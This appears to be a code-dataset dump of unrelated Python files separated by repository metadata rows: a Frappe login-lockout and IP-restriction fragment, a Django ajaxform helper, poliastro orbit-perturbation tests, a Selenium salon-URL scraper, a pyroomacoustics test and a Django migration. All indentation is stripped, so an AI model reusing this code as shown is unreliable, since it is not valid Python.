return '/' + frappe.get_hooks('website_user_home_page')[-1].strip('/')
else:
return '/me'
def get_last_tried_login_data(user, get_last_login=False):
locked_account_time = frappe.cache().hget('locked_account_time', user)
if get_last_login and locked_account_time:
return locked_account_time
last_login_tried = frappe.cache().hget('last_login_tried', user)
if not last_login_tried or last_login_tried < get_datetime():
last_login_tried = get_datetime() + datetime.timedelta(seconds=60)
frappe.cache().hset('last_login_tried', user, last_login_tried)
return last_login_tried
def get_login_failed_count(user):
return cint(frappe.cache().hget('login_failed_count', user)) or 0
def check_consecutive_login_attempts(user, doc):
login_failed_count = get_login_failed_count(user)
last_login_tried = (get_last_tried_login_data(user, True)
+ datetime.timedelta(seconds=doc.allow_login_after_fail))
if login_failed_count >= cint(doc.allow_consecutive_login_attempts):
locked_account_time = frappe.cache().hget('locked_account_time', user)
if not locked_account_time:
frappe.cache().hset('locked_account_time', user, get_datetime())
if last_login_tried > get_datetime():
frappe.throw(_("Your account has been locked and will resume after {0} seconds")
.format(doc.allow_login_after_fail), frappe.SecurityException)
else:
delete_login_failed_cache(user)
def validate_ip_address(user):
"""check if IP Address is valid"""
user = frappe.get_cached_doc("User", user) if not frappe.flags.in_test else frappe.get_doc("User", user)
ip_list = user.get_restricted_ip_list()
if not ip_list:
return
system_settings = frappe.get_cached_doc("System Settings") if not frappe.flags.in_test else frappe.get_single("System Settings")
# check if bypass restrict ip is enabled for all users
bypass_restrict_ip_check = system_settings.bypass_restrict_ip_check_if_2fa_enabled
# check if two factor auth is enabled
if system_settings.enable_two_factor_auth and not bypass_restrict_ip_check:
# check if bypass restrict ip is enabled for login user
bypass_restrict_ip_check = user.bypass_restrict_ip_check_if_2fa_enabled
for ip in ip_list:
if frappe.local.request_ip.startswith(ip) or bypass_restrict_ip_check:
return
frappe.throw(_("Access not allowed from this IP Address"), frappe.AuthenticationError)
| 33.26253 | 129 | 0.747291 |
4a1f7c0f89b6e45b67a8c013c2ed04ebe589bcbd | 1,724 | py | Python | frontend/ajaxform.py | davezen1/calc | 410d114f01e84e9fc6363f58853a4d9451a00ef2 | [
"CC0-1.0"
] | null | null | null | frontend/ajaxform.py | davezen1/calc | 410d114f01e84e9fc6363f58853a4d9451a00ef2 | [
"CC0-1.0"
] | 3 | 2021-03-19T23:45:25.000Z | 2022-03-21T22:21:12.000Z | frontend/ajaxform.py | davezen1/calc | 410d114f01e84e9fc6363f58853a4d9451a00ef2 | [
"CC0-1.0"
] | null | null | null | '''
This module provides back-end Django utilities that make it
easier to interact with the front-end ajaxform component.
This module is tightly coupled to ajaxform.js.
'''
from django.core.urlresolvers import reverse
from django.http import JsonResponse, HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string
def redirect(request, viewname):
'''
Redirect the request to the given URL pattern name or the callable
view object.
This can be called from a form-based view that handles both
ajaxform-intiated ajax requests *and* browser-initiated requests.
The function will detect which client initiated the request and
act accordingly.
'''
redirect_url = reverse(viewname)
if request.is_ajax():
return JsonResponse({'redirect_url': redirect_url})
return HttpResponseRedirect(redirect_url)
def render(request, context, template_name, ajax_template_name):
'''
Render a template response to the client, choosing a
different template depending on whether the request was
initiated by ajaxform or a browser.
Typically this is used within a form-based view; `ajax_template_name`
is usually a partial containing only the form, while
`template_name` is a full page containing the form.
Regardless of which template is used, the same context is passed
into it.
'''
if request.is_ajax():
return JsonResponse({
'form_html': render_to_string(ajax_template_name, context,
request=request)
})
return HttpResponse(render_to_string(template_name, context,
request=request))
| 33.153846 | 73 | 0.701856 |
4a1f7cac2a0de6d38254e4a7c29292fb5c855dcf | 19,757 | py | Python | tests/tests_twobody/test_perturbations.py | zkl2/poliastro | 360817d2e74e15306c02aa05d80d4861cccf1cc2 | [
"MIT"
] | null | null | null | tests/tests_twobody/test_perturbations.py | zkl2/poliastro | 360817d2e74e15306c02aa05d80d4861cccf1cc2 | [
"MIT"
] | null | null | null | tests/tests_twobody/test_perturbations.py | zkl2/poliastro | 360817d2e74e15306c02aa05d80d4861cccf1cc2 | [
"MIT"
] | null | null | null | import functools
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import Angle, solar_system_ephemeris
from astropy.tests.helper import assert_quantity_allclose
from astropy.time import Time
from numpy.linalg import norm
from poliastro.bodies import Earth, Moon, Sun
from poliastro.constants import H0_earth, Wdivc_sun, rho0_earth
from poliastro.core.elements import rv2coe
from poliastro.core.perturbations import (
J2_perturbation,
J3_perturbation,
atmospheric_drag_exponential,
atmospheric_drag_model,
radiation_pressure,
third_body,
)
from poliastro.core.propagation import func_twobody
from poliastro.earth.atmosphere import COESA76
from poliastro.ephem import build_ephem_interpolant
from poliastro.twobody import Orbit
from poliastro.twobody.events import LithobrakeEvent
from poliastro.twobody.propagation import cowell
@pytest.mark.slow
def test_J2_propagation_Earth():
# From Curtis example 12.2:
r0 = np.array([-2384.46, 5729.01, 3050.46]) # km
v0 = np.array([-7.36138, -2.98997, 1.64354]) # km/s
orbit = Orbit.from_vectors(Earth, r0 * u.km, v0 * u.km / u.s)
tofs = [48.0] * u.h
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = J2_perturbation(
t0, u_, k, J2=Earth.J2.value, R=Earth.R.to(u.km).value
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, vv = cowell(Earth.k, orbit.r, orbit.v, tofs, f=f)
k = Earth.k.to(u.km ** 3 / u.s ** 2).value
_, _, _, raan0, argp0, _ = rv2coe(k, r0, v0)
_, _, _, raan, argp, _ = rv2coe(k, rr[0].to(u.km).value, vv[0].to(u.km / u.s).value)
raan_variation_rate = (raan - raan0) / tofs[0].to(u.s).value # type: ignore
argp_variation_rate = (argp - argp0) / tofs[0].to(u.s).value # type: ignore
raan_variation_rate = (raan_variation_rate * u.rad / u.s).to(u.deg / u.h)
argp_variation_rate = (argp_variation_rate * u.rad / u.s).to(u.deg / u.h)
assert_quantity_allclose(raan_variation_rate, -0.172 * u.deg / u.h, rtol=1e-2)
assert_quantity_allclose(argp_variation_rate, 0.282 * u.deg / u.h, rtol=1e-2)
@pytest.mark.slow
@pytest.mark.parametrize(
"test_params",
[
{
"inc": 0.2618 * u.rad,
"da_max": 43.2 * u.m,
"dinc_max": 3.411e-5,
"decc_max": 3.549e-5,
},
{
"inc": 0.7854 * u.rad,
"da_max": 135.8 * u.m,
"dinc_max": 2.751e-5,
"decc_max": 9.243e-5,
},
{
"inc": 1.3090 * u.rad,
"da_max": 58.7 * u.m,
"dinc_max": 0.79e-5,
"decc_max": 10.02e-5,
},
{
"inc": 1.5708 * u.rad,
"da_max": 96.1 * u.m,
"dinc_max": 0.0,
"decc_max": 17.04e-5,
},
],
)
def test_J3_propagation_Earth(test_params):
# Nai-ming Qi, Qilong Sun, Yong Yang, (2018) "Effect of J3 perturbation on satellite position in LEO",
# Aircraft Engineering and Aerospace Technology, Vol. 90 Issue: 1,
# pp.74-86, https://doi.org/10.1108/AEAT-03-2015-0092
a_ini = 8970.667 * u.km
ecc_ini = 0.25 * u.one
raan_ini = 1.047 * u.rad
nu_ini = 0.0 * u.rad
argp_ini = 1.0 * u.rad
inc_ini = test_params["inc"]
k = Earth.k.to(u.km ** 3 / u.s ** 2).value
orbit = Orbit.from_classical(
Earth, a_ini, ecc_ini, inc_ini, raan_ini, argp_ini, nu_ini
)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = J2_perturbation(
t0, u_, k, J2=Earth.J2.value, R=Earth.R.to(u.km).value
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
tofs = np.linspace(0, 10.0 * u.day, 1000)
r_J2, v_J2 = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
rtol=1e-8,
f=f,
)
def f_combined(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = J2_perturbation(
t0, u_, k, J2=Earth.J2.value, R=Earth.R.to_value(u.km)
) + J3_perturbation(t0, u_, k, J3=Earth.J3.value, R=Earth.R.to_value(u.km))
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
r_J3, v_J3 = cowell(Earth.k, orbit.r, orbit.v, tofs, rtol=1e-8, f=f_combined)
a_values_J2 = np.array(
[
rv2coe(k, ri, vi)[0] / (1.0 - rv2coe(k, ri, vi)[1] ** 2)
for ri, vi in zip(r_J2.to(u.km).value, v_J2.to(u.km / u.s).value)
]
)
a_values_J3 = np.array(
[
rv2coe(k, ri, vi)[0] / (1.0 - rv2coe(k, ri, vi)[1] ** 2)
for ri, vi in zip(r_J3.to(u.km).value, v_J3.to(u.km / u.s).value)
]
)
da_max = np.max(np.abs(a_values_J2 - a_values_J3))
ecc_values_J2 = np.array(
[
rv2coe(k, ri, vi)[1]
for ri, vi in zip(r_J2.to(u.km).value, v_J2.to(u.km / u.s).value)
]
)
ecc_values_J3 = np.array(
[
rv2coe(k, ri, vi)[1]
for ri, vi in zip(r_J3.to(u.km).value, v_J3.to(u.km / u.s).value)
]
)
decc_max = np.max(np.abs(ecc_values_J2 - ecc_values_J3))
inc_values_J2 = np.array(
[
rv2coe(k, ri, vi)[2]
for ri, vi in zip(r_J2.to(u.km).value, v_J2.to(u.km / u.s).value)
]
)
inc_values_J3 = np.array(
[
rv2coe(k, ri, vi)[2]
for ri, vi in zip(r_J3.to(u.km).value, v_J3.to(u.km / u.s).value)
]
)
dinc_max = np.max(np.abs(inc_values_J2 - inc_values_J3))
assert_quantity_allclose(dinc_max, test_params["dinc_max"], rtol=1e-1, atol=1e-7)
assert_quantity_allclose(decc_max, test_params["decc_max"], rtol=1e-1, atol=1e-7)
try:
assert_quantity_allclose(da_max * u.km, test_params["da_max"])
except AssertionError:
pytest.xfail("this assertion disagrees with the paper")
@pytest.mark.slow
def test_atmospheric_drag_exponential():
# http://farside.ph.utexas.edu/teaching/celestial/Celestialhtml/node94.html#sair (10.148)
# Given the expression for \dot{r} / r, aproximate \Delta r \approx F_r * \Delta t
R = Earth.R.to(u.km).value
k = Earth.k.to(u.km ** 3 / u.s ** 2).value
# Parameters of a circular orbit with h = 250 km (any value would do, but not too small)
orbit = Orbit.circular(Earth, 250 * u.km)
r0, _ = orbit.rv()
r0 = r0.to(u.km).value
# Parameters of a body
C_D = 2.2 # dimentionless (any value would do)
A_over_m = ((np.pi / 4.0) * (u.m ** 2) / (100 * u.kg)).to_value(
u.km ** 2 / u.kg
) # km^2/kg
B = C_D * A_over_m
# Parameters of the atmosphere
rho0 = rho0_earth.to(u.kg / u.km ** 3).value # kg/km^3
H0 = H0_earth.to(u.km).value # km
tof = 100000 # s
dr_expected = -B * rho0 * np.exp(-(norm(r0) - R) / H0) * np.sqrt(k * norm(r0)) * tof
# Assuming the atmospheric decay during tof is small,
# dr_expected = F_r * tof (Newton's integration formula), where
# F_r = -B rho(r) |r|^2 sqrt(k / |r|^3) = -B rho(r) sqrt(k |r|)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = atmospheric_drag_exponential(
t0, u_, k, R=R, C_D=C_D, A_over_m=A_over_m, H0=H0, rho0=rho0
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
[tof] * u.s,
f=f,
)
assert_quantity_allclose(
norm(rr[0].to(u.km).value) - norm(r0), dr_expected, rtol=1e-2
)
@pytest.mark.slow
def test_atmospheric_demise():
# Test an orbital decay that hits Earth. No analytic solution.
R = Earth.R.to(u.km).value
orbit = Orbit.circular(Earth, 230 * u.km)
t_decay = 48.2179 * u.d # not an analytic value
# Parameters of a body
C_D = 2.2 # dimentionless (any value would do)
A_over_m = ((np.pi / 4.0) * (u.m ** 2) / (100 * u.kg)).to_value(
u.km ** 2 / u.kg
) # km^2/kg
# Parameters of the atmosphere
rho0 = rho0_earth.to(u.kg / u.km ** 3).value # kg/km^3
H0 = H0_earth.to(u.km).value # km
tofs = [365] * u.d # Actually hits the ground a bit after day 48
lithobrake_event = LithobrakeEvent(R)
events = [lithobrake_event]
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = atmospheric_drag_exponential(
t0, u_, k, R=R, C_D=C_D, A_over_m=A_over_m, H0=H0, rho0=rho0
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
events=events,
f=f,
)
assert_quantity_allclose(norm(rr[0].to(u.km).value), R, atol=1) # Below 1km
assert_quantity_allclose(lithobrake_event.last_t, t_decay, rtol=1e-2)
# Make sure having the event not firing is ok
tofs = [1] * u.d
lithobrake_event = LithobrakeEvent(R)
events = [lithobrake_event]
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
events=events,
f=f,
)
assert lithobrake_event.last_t == tofs[-1]
@pytest.mark.slow
def test_atmospheric_demise_coesa76():
# Test an orbital decay that hits Earth. No analytic solution.
R = Earth.R.to(u.km).value
orbit = Orbit.circular(Earth, 250 * u.km)
t_decay = 7.17 * u.d
# Parameters of a body
C_D = 2.2 # Dimensionless (any value would do)
A_over_m = ((np.pi / 4.0) * (u.m ** 2) / (100 * u.kg)).to_value(
u.km ** 2 / u.kg
) # km^2/kg
tofs = [365] * u.d
lithobrake_event = LithobrakeEvent(R)
events = [lithobrake_event]
coesa76 = COESA76()
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = atmospheric_drag_model(
t0, u_, k, R=R, C_D=C_D, A_over_m=A_over_m, model=coesa76
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
events=events,
f=f,
)
assert_quantity_allclose(norm(rr[0].to(u.km).value), R, atol=1) # Below 1km
assert_quantity_allclose(lithobrake_event.last_t, t_decay, rtol=1e-2)
@pytest.mark.slow
def test_cowell_works_with_small_perturbations():
r0 = [-2384.46, 5729.01, 3050.46] * u.km
v0 = [-7.36138, -2.98997, 1.64354] * u.km / u.s
r_expected = [
13179.39566663877121754922,
-13026.25123408228319021873,
-9852.66213692844394245185,
] * u.km
v_expected = (
[2.78170542314378943516, 3.21596786944631274352, 0.16327165546278937791]
* u.km
/ u.s
)
initial = Orbit.from_vectors(Earth, r0, v0)
def accel(t0, state, k):
v_vec = state[3:]
norm_v = (v_vec * v_vec).sum() ** 0.5
return 1e-5 * v_vec / norm_v
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = accel(t0, u_, k)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
final = initial.propagate(3 * u.day, method=cowell, f=f)
assert_quantity_allclose(final.r, r_expected)
assert_quantity_allclose(final.v, v_expected)
@pytest.mark.slow
def test_cowell_converges_with_small_perturbations():
r0 = [-2384.46, 5729.01, 3050.46] * u.km
v0 = [-7.36138, -2.98997, 1.64354] * u.km / u.s
initial = Orbit.from_vectors(Earth, r0, v0)
def accel(t0, state, k):
v_vec = state[3:]
norm_v = (v_vec * v_vec).sum() ** 0.5
return 0.0 * v_vec / norm_v
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = accel(t0, u_, k)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
final = initial.propagate(initial.period, method=cowell, f=f)
assert_quantity_allclose(final.r, initial.r)
assert_quantity_allclose(final.v, initial.v)
moon_heo = {
"body": Moon,
"tof": 60 * u.day,
"raan": -0.06 * u.deg,
"argp": 0.15 * u.deg,
"inc": 0.08 * u.deg,
"orbit": [
26553.4 * u.km,
0.741 * u.one,
63.4 * u.deg,
0.0 * u.deg,
-10.12921 * u.deg,
0.0 * u.rad,
],
"period": 28 * u.day,
}
moon_leo = {
"body": Moon,
"tof": 60 * u.day,
"raan": -2.18 * 1e-4 * u.deg,
"argp": 15.0 * 1e-3 * u.deg,
"inc": 6.0 * 1e-4 * u.deg,
"orbit": [
6678.126 * u.km,
0.01 * u.one,
28.5 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 28 * u.day,
}
moon_geo = {
"body": Moon,
"tof": 60 * u.day,
"raan": 6.0 * u.deg,
"argp": -11.0 * u.deg,
"inc": 6.5 * 1e-3 * u.deg,
"orbit": [
42164.0 * u.km,
0.0001 * u.one,
1 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 28 * u.day,
}
sun_heo = {
"body": Sun,
"tof": 200 * u.day,
"raan": -0.10 * u.deg,
"argp": 0.2 * u.deg,
"inc": 0.1 * u.deg,
"orbit": [
26553.4 * u.km,
0.741 * u.one,
63.4 * u.deg,
0.0 * u.deg,
-10.12921 * u.deg,
0.0 * u.rad,
],
"period": 365 * u.day,
}
sun_leo = {
"body": Sun,
"tof": 200 * u.day,
"raan": -6.0 * 1e-3 * u.deg,
"argp": 0.02 * u.deg,
"inc": -1.0 * 1e-4 * u.deg,
"orbit": [
6678.126 * u.km,
0.01 * u.one,
28.5 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 365 * u.day,
}
sun_geo = {
"body": Sun,
"tof": 200 * u.day,
"raan": 8.7 * u.deg,
"argp": -5.5 * u.deg,
"inc": 5.5e-3 * u.deg,
"orbit": [
42164.0 * u.km,
0.0001 * u.one,
1 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 365 * u.day,
}
@pytest.mark.slow
@pytest.mark.parametrize(
"test_params",
[
moon_heo,
moon_geo,
moon_leo,
sun_heo,
sun_geo,
pytest.param(
sun_leo,
marks=pytest.mark.skip(
reason="here agreement required rtol=1e-10, too long for 200 days"
),
),
],
)
def test_3rd_body_Curtis(test_params):
# Based on example 12.11 from Howard Curtis
body = test_params["body"]
with solar_system_ephemeris.set("builtin"):
j_date = 2454283.0 * u.day
tof = (test_params["tof"]).to(u.s).value
body_r = build_ephem_interpolant(
body,
test_params["period"],
(j_date, j_date + test_params["tof"]),
rtol=1e-2,
)
epoch = Time(j_date, format="jd", scale="tdb")
initial = Orbit.from_classical(Earth, *test_params["orbit"], epoch=epoch)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = third_body(
t0,
u_,
k,
k_third=body.k.to(u.km ** 3 / u.s ** 2).value,
perturbation_body=body_r,
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, vv = cowell(
Earth.k,
initial.r,
initial.v,
np.linspace(0, tof, 400) * u.s,
rtol=1e-10,
f=f,
)
incs, raans, argps = [], [], []
for ri, vi in zip(rr.to(u.km).value, vv.to(u.km / u.s).value):
angles = Angle(
rv2coe(Earth.k.to(u.km ** 3 / u.s ** 2).value, ri, vi)[2:5] * u.rad
) # inc, raan, argp
angles = angles.wrap_at(180 * u.deg)
incs.append(angles[0].value)
raans.append(angles[1].value)
argps.append(angles[2].value)
# Averaging over 5 last values in the way Curtis does
inc_f, raan_f, argp_f = (
np.mean(incs[-5:]),
np.mean(raans[-5:]),
np.mean(argps[-5:]),
)
assert_quantity_allclose(
[
(raan_f * u.rad).to(u.deg) - test_params["orbit"][3],
(inc_f * u.rad).to(u.deg) - test_params["orbit"][2],
(argp_f * u.rad).to(u.deg) - test_params["orbit"][4],
],
[test_params["raan"], test_params["inc"], test_params["argp"]],
rtol=1e-1,
)
@pytest.fixture(scope="module")
def sun_r():
j_date = 2_438_400.5 * u.day
tof = 600 * u.day
return build_ephem_interpolant(Sun, 365 * u.day, (j_date, j_date + tof), rtol=1e-2)
def normalize_to_Curtis(t0, sun_r):
r = sun_r(t0)
return 149600000 * r / norm(r)
@pytest.mark.slow
@pytest.mark.parametrize(
"t_days,deltas_expected",
[
(200, [3e-3, -8e-3, -0.035, -80.0]),
(400, [-1.3e-3, 0.01, -0.07, 8.0]),
(600, [7e-3, 0.03, -0.10, -80.0]),
# (800, [-7.5e-3, 0.02, -0.13, 1.7]),
# (1000, [6e-3, 0.065, -0.165, -70.0]),
# (1095, [0.0, 0.06, -0.165, -10.0]),
],
)
def test_solar_pressure(t_days, deltas_expected, sun_r):
# Based on example 12.9 from Howard Curtis
with solar_system_ephemeris.set("builtin"):
j_date = 2_438_400.5 * u.day
tof = 600 * u.day
epoch = Time(j_date, format="jd", scale="tdb")
initial = Orbit.from_classical(
Earth,
10085.44 * u.km,
0.025422 * u.one,
88.3924 * u.deg,
45.38124 * u.deg,
227.493 * u.deg,
343.4268 * u.deg,
epoch=epoch,
)
# In Curtis, the mean distance to Sun is used. In order to validate against it, we have to do the same thing
sun_normalized = functools.partial(normalize_to_Curtis, sun_r=sun_r)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = radiation_pressure(
t0,
u_,
k,
R=Earth.R.to(u.km).value,
C_R=2.0,
A_over_m=2e-4 / 100,
Wdivc_s=Wdivc_sun.value,
star=sun_normalized,
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, vv = cowell(
Earth.k,
initial.r,
initial.v,
np.linspace(0, (tof).to(u.s).value, 4000) * u.s,
rtol=1e-8,
f=f,
)
delta_eccs, delta_incs, delta_raans, delta_argps = [], [], [], []
for ri, vi in zip(rr.to(u.km).value, vv.to(u.km / u.s).value):
orbit_params = rv2coe(Earth.k.to(u.km ** 3 / u.s ** 2).value, ri, vi)
delta_eccs.append(orbit_params[1] - initial.ecc.value)
delta_incs.append(
(orbit_params[2] * u.rad).to(u.deg).value - initial.inc.value
)
delta_raans.append(
(orbit_params[3] * u.rad).to(u.deg).value - initial.raan.value
)
delta_argps.append(
(orbit_params[4] * u.rad).to(u.deg).value - initial.argp.value
)
# Averaging over 5 last values in the way Curtis does
index = int(1.0 * t_days / tof.to(u.day).value * 4000) # type: ignore
delta_ecc, delta_inc, delta_raan, delta_argp = (
np.mean(delta_eccs[index - 5 : index]),
np.mean(delta_incs[index - 5 : index]),
np.mean(delta_raans[index - 5 : index]),
np.mean(delta_argps[index - 5 : index]),
)
assert_quantity_allclose(
[delta_ecc, delta_inc, delta_raan, delta_argp],
deltas_expected,
rtol=1e0, # TODO: Excessively low, rewrite test?
atol=1e-4,
)
| 28.842336 | 116 | 0.531305 |
4a1f7dfda3ee440f98ffc7df92580b3f29f36b86 | 2,933 | py | Python | Great Clips (US)/great_clips_store_urls.py | CAVIND46016/Locational-Data-Scraping | 234cee509a0d52fb1b2feebdd2400ea451fa7357 | [
"MIT"
] | 3 | 2020-04-18T03:13:52.000Z | 2020-06-18T03:55:52.000Z | Great Clips (US)/great_clips_store_urls.py | CAVIND46016/Locational-Data-Scraping | 234cee509a0d52fb1b2feebdd2400ea451fa7357 | [
"MIT"
] | null | null | null | Great Clips (US)/great_clips_store_urls.py | CAVIND46016/Locational-Data-Scraping | 234cee509a0d52fb1b2feebdd2400ea451fa7357 | [
"MIT"
] | null | null | null | import pickle
import json
from http.client import RemoteDisconnected
import time
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait, Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
import pandas as pd
def get_browser():
chrome_options = Options()
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument('--disable-notifications')
driver = webdriver.Chrome(executable_path='C:\\Aptana Workspace\\chromedriver.exe',
options=chrome_options)
return driver
def main():
us_postal_codes_df = pd.read_csv("us_postal_codes.csv")
us_postal_codes_df = us_postal_codes_df.loc[~us_postal_codes_df['Zip Code'].isnull()]
us_postal_codes_df = us_postal_codes_df.loc[(us_postal_codes_df['State'] == 'New York') &
(us_postal_codes_df['County'] == 'New York')]
all_codes = us_postal_codes_df['Zip Code'].unique().tolist()
length_of_all_codes = len(all_codes)
driver = get_browser()
base_url = "https://www.greatclips.com"
page_url = "https://www.greatclips.com/#"
try:
driver.set_page_load_timeout(40)
driver.get(page_url)
except TimeoutException:
raise Exception(f"\t{page_url} - Timed out receiving message from renderer")
except RemoteDisconnected:
raise Exception(f"\tError 404: {page_url} not found.")
WebDriverWait(driver, timeout=40).until(EC.presence_of_element_located((By.CLASS_NAME, "fas-searchbar")))
srch_bar = driver.find_element_by_id("term")
srch_btn = driver.find_element_by_class_name("fas-search-btn")
all_store_urls = set()
for idx, zip_code in enumerate(all_codes):
print(f"Processing zip code {idx+1} of {length_of_all_codes} - {zip_code}...")
srch_bar.send_keys(str(zip_code))
srch_btn.click()
time.sleep(5)
soup = BeautifulSoup(driver.page_source, "html.parser")
results_class = soup.find("div", attrs={"class": "fas-results"})
salon_titles = results_class.find_all("h2", attrs={"class": "fas-salon-title"})
for salon_title in salon_titles:
href = salon_title.find("a")['href']
all_store_urls.add(f"{base_url}{href}")
srch_bar.clear()
driver.quit()
print(f"Pickling list of {len(all_store_urls)} store_urls to file...")
with open('great_clips_store_urls.pkl', 'wb') as pkl_file:
pickle.dump(all_store_urls, pkl_file)
print(all_store_urls)
print("DONE!!!")
if __name__ == "__main__":
main()
| 36.209877 | 110 | 0.662121 |
4a1f7e9b68ad14590b609ce183d50263a7e99b63 | 858 | py | Python | pyroomacoustics/tests/test_issue_87.py | Womac/pyroomacoustics | af452ea42686eb12df34dd7ffdb0c833b64b27f9 | [
"MIT"
] | 915 | 2016-02-08T08:10:37.000Z | 2022-03-31T17:33:21.000Z | pyroomacoustics/tests/test_issue_87.py | zha80052/pyroomacoustics | 15a86425b68969b2109860ca3614f0cbf92b1bd0 | [
"MIT"
] | 212 | 2017-02-06T13:06:30.000Z | 2022-03-28T14:32:15.000Z | pyroomacoustics/tests/test_issue_87.py | zha80052/pyroomacoustics | 15a86425b68969b2109860ca3614f0cbf92b1bd0 | [
"MIT"
] | 513 | 2016-11-15T05:41:49.000Z | 2022-03-29T15:41:09.000Z | import unittest
import numpy as np
import pyroomacoustics as pra
def make_filters(n_mics):
# Location of original source
azimuth = 61.0 / 180.0 * np.pi # 60 degrees
# algorithms parameters
c = 343.0
fs = 16000
# circular microphone array, 6 mics, radius 15 cm
R = pra.circular_2D_array([0, 0], n_mics, 0.0, 0.15)
# propagation filter bank
propagation_vector = -np.array([np.cos(azimuth), np.sin(azimuth)])
delays = np.dot(R.T, propagation_vector) / c * fs # in fractional samples
filter_bank = pra.fractional_delay_filter_bank(delays)
return filter_bank
class TestIssue87(unittest.TestCase):
def test_12_mics(self):
# this was working
make_filters(12)
def test_6_mics(self):
# but this failed
make_filters(6)
if __name__ == "__main__":
unittest.main()
| 22.578947 | 78 | 0.666667 |
4a1f7ec4e8f3f15edbe79d334cda444ec27185bd | 3,384 | py | Python | feeds/migrations/0001_initial.py | StevenMonty/django-feed-reader | 95731a4178f028f6539c55dce77928a377a9cdd9 | [
"MIT"
] | 21 | 2019-06-21T09:17:32.000Z | 2022-03-04T06:55:36.000Z | feeds/migrations/0001_initial.py | StevenMonty/django-feed-reader | 95731a4178f028f6539c55dce77928a377a9cdd9 | [
"MIT"
] | 7 | 2020-09-07T12:21:55.000Z | 2020-10-27T17:39:58.000Z | feeds/migrations/0001_initial.py | StevenMonty/django-feed-reader | 95731a4178f028f6539c55dce77928a377a9cdd9 | [
"MIT"
] | 15 | 2019-09-01T03:58:17.000Z | 2022-01-16T05:25:40.000Z | # Generated by Django 2.2.1 on 2019-06-02 17:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Source',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=255, null=True)),
('site_url', models.CharField(blank=True, max_length=255, null=True)),
('feed_url', models.CharField(max_length=255)),
('image_url', models.CharField(blank=True, max_length=255, null=True)),
('last_polled', models.DateTimeField(blank=True, max_length=255, null=True)),
('due_poll', models.DateTimeField()),
('etag', models.CharField(blank=True, max_length=255, null=True)),
('last_modified', models.CharField(blank=True, max_length=255, null=True)),
('last_result', models.CharField(blank=True, max_length=255, null=True)),
('interval', models.PositiveIntegerField(default=400)),
('last_success', models.DateTimeField(null=True)),
('last_change', models.DateTimeField(null=True)),
('live', models.BooleanField(default=True)),
('status_code', models.PositiveIntegerField(default=0)),
('last_302_url', models.CharField(blank=True, max_length=255, null=True)),
('last_302_start', models.DateTimeField(blank=True, null=True)),
('max_index', models.IntegerField(default=0)),
('num_subs', models.IntegerField(default=1)),
('is_cloudflare', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField(blank=True)),
('body', models.TextField()),
('link', models.CharField(blank=True, max_length=512, null=True)),
('found', models.DateTimeField(auto_now_add=True)),
('created', models.DateTimeField(db_index=True)),
('guid', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('author', models.CharField(blank=True, max_length=255, null=True)),
('index', models.IntegerField(db_index=True)),
('source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feeds.Source')),
],
options={
'ordering': ['index'],
},
),
migrations.CreateModel(
name='Enclosure',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('length', models.IntegerField(default=0)),
('href', models.CharField(max_length=512)),
('type', models.CharField(max_length=256)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feeds.Post')),
],
),
]
| 49.043478 | 114 | 0.573877 |
4a1f7f5dc9900ca0fbf2c450e14dc5e839febe39 | 111,333 | py | Python | python/paddle/tensor/manipulation.py | wwjiang007/Paddle | bdeb479c0edd1ab9bb5f696df3573dad63d67885 | [
"Apache-2.0"
